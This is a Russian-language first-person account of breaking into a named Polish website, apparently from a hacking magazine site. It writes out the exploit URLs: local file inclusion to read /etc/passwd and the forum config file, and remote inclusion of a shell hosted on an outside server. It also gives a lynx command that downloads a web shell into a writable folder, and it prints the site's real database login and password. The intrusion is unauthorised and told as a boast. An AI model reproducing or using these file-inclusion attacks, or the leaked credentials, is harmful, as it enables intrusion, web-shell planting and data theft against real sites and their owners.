На днях в асю стукнул знакомый с вопросом, что можно сделать с локальной
инклудой. Я прекрасно помнил, как в свое время,
найдя баг в
Search Engine & Directory Powered by Turbo Seek от FocalMedia.Net, взломал
www.uscomputer.net. Там была возможность чтения произвольных файлов с правами
сервера, найдя пароль в .htpasswd и расшифровав его я получил доступ к сайту. Я
объяснил знакомому механизм, но минут через 5 он стукнул вновь и сказал, что у
него ни чего не выходит. Тогда я попросил у него URL что бы разобраться на
месте. Это был польский сайт
www.sacriversum.com.

Первым в глаза бросился форум phpBB неизвестно какой версии, я решил его
инжектить, но эксплойты не действовали. Снифание админских куков я решил
оставить на потом. Тогда я занялся локальной инклудой. Параметр text скрипта
prasa.php позволял читать любые файлы:

http://www.sacriversum.com/prasa.php?text=../../../../etc/passwd ,

но ни .htpasswd, ни service.pwd тут не оказалось. Попробовал я внешнюю инклуду,
но вместо результата выполнения команды увидел исходный код своего шелла. Тут же
сразу возникла идея вывести содержимое форумного config.php, выполнив запрос

http://www.sacriversum.com/prasa.php?text=./forum/config.php

и глянув исходный код страницы я получил заветный логин и пассворд для конекта к
MySQL:

<?php
//
// phpBB 2.x auto-generated config file
// Do not change anything in this file!
//
$dbms = 'mysql';
$dbhost = 'localhost';
$dbname = 'sacriversum';
$dbuser = 'mackozer';
$dbpasswd = 'turambar';
$table_prefix = 'phpbb_';
define('PHPBB_INSTALLED', true);
?>

Попробовал подключиться с этими данными к фтп и был послан, пароль не подходил.
Стал изучать сайт дальше и нашел чудесный скрипт download.php, который
инклудился без проблем:
 
http://www.sacriversum.com/download.php?plik= http://xxx.narod.ru/sh.php&cmd=id

Оставалось только найди папку доступную на запись и залить веб-шелл. Папка такая
нашлась сразу, заботливая рука админа выставила ей разрешение на запись:

drwxrwxrwx 4 mackozer mackozer 512 Apr 17 08:54 revenger/

Оставалось только найти чем закачать свое добро. На серваке кроме lynx не
оказалось больше ничего. Пришлось искать мануал по lynx, кстати русскоязычных я
практически не нашел. В конце концов я залил полноценный шелл:

http://www.sacriversum.com/download.php?plik= http://xxx.narod.ru/sh.php&cmd=lynx
-source http://xxx.narod.ru/fags.php > ./revenger/fags.php

а также сдампил базу форума, может на что сгодится. Потом поэтапно разъяснил
знакомому как и что делал.

Не ахти какой взлом, но он еще раз подтверждает истину: "кто ищет, тот
найдет".

А девелоперы все таки рулят!

Check Also

DDoS на Bluetooth. Разбираем трюк, который поможет отключить чужую колонку

На свете существует не так много вещей, которые бесят практически всех без исключения. Это…

Оставить мнение